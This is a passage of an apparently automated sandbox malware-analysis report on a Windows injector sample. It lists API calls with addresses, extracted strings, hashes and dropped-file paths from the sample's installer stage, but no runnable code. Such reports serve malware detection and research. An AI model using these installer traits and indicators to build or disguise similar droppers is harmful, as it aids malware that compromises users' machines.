                                            • GetDlgItem.USER32(?,000003F9), ref: 00404C44
                                            • GetDlgItem.USER32(?,00000408), ref: 00404C4F
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404C99
                                            • LoadBitmapW.USER32(0000006E), ref: 00404CAC
                                            • SetWindowLongW.USER32(?,000000FC,00405224), ref: 00404CC5
                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404CD9
                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404CEB
                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404D01
                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D0D
                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D1F
                                            • DeleteObject.GDI32(00000000), ref: 00404D22
                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D4D
                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D59
                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404DEF
                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E1A
                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2E
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404E5D
                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E6B
                                            • ShowWindow.USER32(?,00000005), ref: 00404E7C
                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404F79
                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404FDE
                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404FF3
                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405017
                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405037
                                            • ImageList_Destroy.COMCTL32(?), ref: 0040504C
                                            • GlobalFree.KERNEL32(?), ref: 0040505C
                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004050D5
                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040517E
                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040518D
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004051AD
                                            • ShowWindow.USER32(?,00000000), ref: 004051FB
                                            • GetDlgItem.USER32(?,000003FE), ref: 00405206
                                            • ShowWindow.USER32(00000000), ref: 0040520D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                            • String ID: $M$N
                                            • API String ID: 1638840714-813528018
                                            APIs
                                            • GetDlgItem.USER32(?,000003FB), ref: 004046FF
                                            • SetWindowTextW.USER32(00000000,?), ref: 00404729
                                            • SHBrowseForFolderW.SHELL32(?), ref: 004047DA
                                            • CoTaskMemFree.OLE32(00000000), ref: 004047E5
                                            • lstrcmpiW.KERNEL32(: Completed,004236E8,00000000,?,?), ref: 00404817
                                            • lstrcatW.KERNEL32(?,: Completed), ref: 00404823
                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404835
                                              • Part of subcall function 00405892: GetDlgItemTextW.USER32(?,?,00000400,0040486C), ref: 004058A5
                                              • Part of subcall function 004064E0: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe",00403318,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00406543
                                              • Part of subcall function 004064E0: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406552
                                              • Part of subcall function 004064E0: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe",00403318,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00406557
                                              • Part of subcall function 004064E0: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe",00403318,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 0040656A
                                            • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 004048F8
                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404913
                                              • Part of subcall function 00404A6C: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B0D
                                              • Part of subcall function 00404A6C: wsprintfW.USER32 ref: 00404B16
                                              • Part of subcall function 00404A6C: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B29
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: : Completed$A$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea$6B
                                            • API String ID: 2624150263-1256906607
                                            APIs
                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040441C
                                            • GetDlgItem.USER32(?,000003E8), ref: 00404430
                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040444D
                                            • GetSysColor.USER32(?), ref: 0040445E
                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040446C
                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040447A
                                            • lstrlenW.KERNEL32(?), ref: 0040447F
                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040448C
                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044A1
                                            • GetDlgItem.USER32(?,0000040A), ref: 004044FA
                                            • SendMessageW.USER32(00000000), ref: 00404501
                                            • GetDlgItem.USER32(?,000003E8), ref: 0040452C
                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040456F
                                            • LoadCursorW.USER32(00000000,00007F02), ref: 0040457D
                                            • SetCursor.USER32(00000000), ref: 00404580
                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00404599
                                            • SetCursor.USER32(00000000), ref: 0040459C
                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004045CB
                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004045DD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                            • String ID: : Completed$N
                                            • API String ID: 3103080414-2140067464
                                            APIs
                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                            • BeginPaint.USER32(?,?), ref: 00401047
                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                            • DeleteObject.GDI32(?), ref: 004010ED
                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                            • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                            • DeleteObject.GDI32(?), ref: 00401165
                                            • EndPaint.USER32(?,?), ref: 0040116E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                            • String ID: F
                                            • API String ID: 941294808-1304234792
                                            • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                            • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                            • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                            • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                            APIs
                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406033,?,?), ref: 00405ED3
                                            • GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405EDC
                                              • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                              • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                            • GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405EF9
                                            • wsprintfA.USER32 ref: 00405F17
                                            • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F52
                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F61
                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
                                            • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEF
                                            • GlobalFree.KERNEL32(00000000), ref: 00406000
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406007
                                              • Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                              • Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                            • String ID: %ls=%ls$[Rename]
                                            • API String ID: 2171350718-461813615
                                            • Opcode ID: e2dce14ec57fd102e1061d77b498a0ceb59b39116d7a7688ffb8e9b872a7f50f
                                            • Instruction ID: 4a393c650f5efb56d04c3c3372b5421d1ec1fa5455b413989d263a6ec4772352
                                            • Opcode Fuzzy Hash: e2dce14ec57fd102e1061d77b498a0ceb59b39116d7a7688ffb8e9b872a7f50f
                                            • Instruction Fuzzy Hash: 9E316870240B19BBD220ABA59E48F6B3A5CDF41758F15003BF946F72C2DA7CD8118ABD
                                            APIs
                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe",00403318,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00406543
                                            • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406552
                                            • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe",00403318,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00406557
                                            • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe",00403318,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 0040656A
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004064E1, 004064E6
                                            • *?|<>/":, xrefs: 00406532
                                            • "C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe", xrefs: 004064E0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Char$Next$Prev
                                            • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 589700163-1872199291
                                            • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                            • Instruction ID: 6610343985016d4d3861ed5752e28572e14021042ee5aa5e44fa789d85a72fac
                                            • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                            • Instruction Fuzzy Hash: 0811B255800612A5DB303B14AD40AB7A2B8EF58794F52403FED9AB32C5E77C9C9286BD
                                            APIs
                                            • GetWindowLongW.USER32(?,000000EB), ref: 00404265
                                            • GetSysColor.USER32(00000000), ref: 00404281
                                            • SetTextColor.GDI32(?,00000000), ref: 0040428D
                                            • SetBkMode.GDI32(?,?), ref: 00404299
                                            • GetSysColor.USER32(?), ref: 004042AC
                                            • SetBkColor.GDI32(?,?), ref: 004042BC
                                            • DeleteObject.GDI32(?), ref: 004042D6
                                            • CreateBrushIndirect.GDI32(?), ref: 004042E0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                            • String ID:
                                            • API String ID: 2320649405-0
                                            • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                            • Instruction ID: 35b1f235034bf6ed7bc4b251198a1cd7c2be2f7e10ce7e0bcb7d9fbd5291f4f5
                                            • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                            • Instruction Fuzzy Hash: D7218471600704AFCB219F68DE08B4BBBF8AF41750B04897EFD95E26A0D734D904CB64
                                            APIs
                                            • ReadFile.KERNEL32(?,?,?,?), ref: 004026B0
                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                              • Part of subcall function 00405E1F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E35
                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                            • String ID: 9
                                            • API String ID: 163830602-2366072709
                                            • Opcode ID: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                            • Instruction ID: e157cda522c6117da55a2477cd969df60feaafed97a1adf3b1f02a042ae2ebc2
                                            • Opcode Fuzzy Hash: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                            • Instruction Fuzzy Hash: 9C51F774D10219ABDF20DFA5DA88AAEB779FF04304F50443BE511B72D1D7B89982CB58
                                            APIs
                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404B95
                                            • GetMessagePos.USER32 ref: 00404B9D
                                            • ScreenToClient.USER32(?,?), ref: 00404BB7
                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BC9
                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404BEF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Message$Send$ClientScreen
                                            • String ID: f
                                            • API String ID: 41195575-1993550816
                                            • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                            • Instruction ID: 6d27a89fd112f7dd13df74400405474d9978eabb633620400ae5318118f47dfb
                                            • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                            • Instruction Fuzzy Hash: CD015E71900218BADB00DB94DD85FFFBBBCAF95711F10412BBA51B61D0D7B4A9018BA4
                                            APIs
                                            • GetDC.USER32(?), ref: 00401DB6
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                            • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                            • CreateFontIndirectW.GDI32(0040CDB0), ref: 00401E38
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                            • String ID: Calibri
                                            • API String ID: 3808545654-1409258342
                                            • Opcode ID: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
                                            • Instruction ID: beb1058faab58ab776b37266111e77616320e0f2a6455f46a6b6c1c153f06785
                                            • Opcode Fuzzy Hash: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
                                            • Instruction Fuzzy Hash: B6015272558241EFE7006BB0AF8AA9A7FB4AB55301F10497EF241B61E2CA7800458B2D
                                            APIs
                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                            • MulDiv.KERNEL32(00074600,00000064,000F1E30), ref: 00402E20
                                            • wsprintfW.USER32 ref: 00402E30
                                            • SetWindowTextW.USER32(?,?), ref: 00402E40
                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                            Strings
                                            • verifying installer: %d%%, xrefs: 00402E2A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Text$ItemTimerWindowwsprintf
                                            • String ID: verifying installer: %d%%
                                            • API String ID: 1451636040-82062127
                                            • Opcode ID: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                            • Instruction ID: 725db9d4d41e60ee2dd5d311e5346f84fbed97106a71cca60d70b9a4d06edbb5
                                            • Opcode Fuzzy Hash: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                            • Instruction Fuzzy Hash: 73014471640208ABDF209F60DD49FAA3B69EB00708F008039FA05F91D0DBB989558B99
                                            APIs
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                            • GlobalFree.KERNEL32(?), ref: 00402950
                                            • GlobalFree.KERNEL32(00000000), ref: 00402963
                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                            • String ID:
                                            • API String ID: 2667972263-0
                                            • Opcode ID: 794126d87b7ab7f3e2e070d8386bcb8afdde5fae5b7e809f26f6fd9fec4836ff
                                            • Instruction ID: c6e800f027f1e1b1e461e4fc783814b3910171fe2b09394c7840a14eb176b3fb
                                            • Opcode Fuzzy Hash: 794126d87b7ab7f3e2e070d8386bcb8afdde5fae5b7e809f26f6fd9fec4836ff
                                            • Instruction Fuzzy Hash: 9821BFB1D00124BBDF206FA5DE49D9E7E79EF08364F10423AF954762E1CB794C419B98
                                            APIs
                                            • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B0D
                                            • wsprintfW.USER32 ref: 00404B16
                                            • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B29
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ItemTextlstrlenwsprintf
                                            • String ID: %u.%u%s%s$6B
                                            • API String ID: 3540041739-3884863406
                                            • Opcode ID: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
                                            • Instruction ID: 5e68f5a3766037a7274f1f000e531c578f4d2f2b22a3e42eca2e55653584bdbe
                                            • Opcode Fuzzy Hash: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
                                            • Instruction Fuzzy Hash: F111D8736481283BDB00656D9C45E9F329CDB81374F150237FE66F61D1D9788C2186EC
                                            APIs
                                            • WideCharToMultiByte.KERNEL32(?,?,sarcoderma,000000FF,C:\Windows\Intragantes.geo,00000400,?,?,00000021), ref: 004025E2
                                            • lstrlenA.KERNEL32(C:\Windows\Intragantes.geo,?,?,sarcoderma,000000FF,C:\Windows\Intragantes.geo,00000400,?,?,00000021), ref: 004025ED
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWidelstrlen
                                            • String ID: C:\Windows\Intragantes.geo$sarcoderma
                                            • API String ID: 3109718747-3933101654
                                            • Opcode ID: 0ec32d5fc753f1a73e59ed2e949e40f7473725568fa61f063b052c02e944df7f
                                            • Instruction ID: 514f5b9530cea4d9367e026ee51610d144416164e286c499b2b09fde189c8ffc
                                            • Opcode Fuzzy Hash: 0ec32d5fc753f1a73e59ed2e949e40f7473725568fa61f063b052c02e944df7f
                                            • Instruction Fuzzy Hash: B8113B32A00200FFDB146FB18E8D99F76649F54345F20843BF502F22C1D9BC49415B5E
                                            APIs
                                            • GetDlgItem.USER32(?,?), ref: 00401D5D
                                            • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                            • DeleteObject.GDI32(00000000), ref: 00401DA8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                            • String ID:
                                            • API String ID: 1849352358-0
                                            • Opcode ID: 2e926fbddc9d53b4849064fbd2325b8602243f9cfaa17b252278c42eeb429d9a
                                            • Instruction ID: 477f9c078023e6e9cc07b453b9f7f3a7004dd49873a1bfc78c69f95ea128efdf
                                            • Opcode Fuzzy Hash: 2e926fbddc9d53b4849064fbd2325b8602243f9cfaa17b252278c42eeb429d9a
                                            • Instruction Fuzzy Hash: CAF0EC72604518AFDB01DBE4DE88CEEB7BCEB08341B14047AF641F61A1CA749D118B78
                                            APIs
                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00405B23
                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00405B2D
                                            • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B3F
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B1D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrcatlstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 2659869361-3081826266
                                            • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                            • Instruction ID: c0ef0cb97c36de63e92d9fca1924244fe31698b984028f6787b43ddfdde79dcc
                                            • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                            • Instruction Fuzzy Hash: 7FD0A731106530AAC1117B548C04DDF72AC9E46344342047FF201B70A1C77C2D6287FD
                                            APIs
                                            • DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
                                            • GetTickCount.KERNEL32 ref: 00402E8E
                                            • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
                                            • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                            • String ID:
                                            • API String ID: 2102729457-0
                                            • Opcode ID: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                            • Instruction ID: fe37ef1f42e63d928baf9b7628c588a3f0f600393ee4f6b464cc40035c08f26a
                                            • Opcode Fuzzy Hash: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                            • Instruction Fuzzy Hash: FAF03A30945620EFC7216B64FE0C99B7B65BB04B0174549BEF444F11A8CBB54881CA9C
                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 00405253
                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004052A4
                                              • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Window$CallMessageProcSendVisible
                                            • String ID:
                                            • API String ID: 3748168415-3916222277
                                            • Opcode ID: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                            • Instruction ID: c9233ab90339d663537cd0f4838c8d9c3e37dbb77af5ce129741796423ccaa39
                                            • Opcode Fuzzy Hash: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                            • Instruction Fuzzy Hash: 4701717160060CABDF218F11ED80A9B3766EF94355F10447AF604752D0C77AAD929E2D
                                            APIs
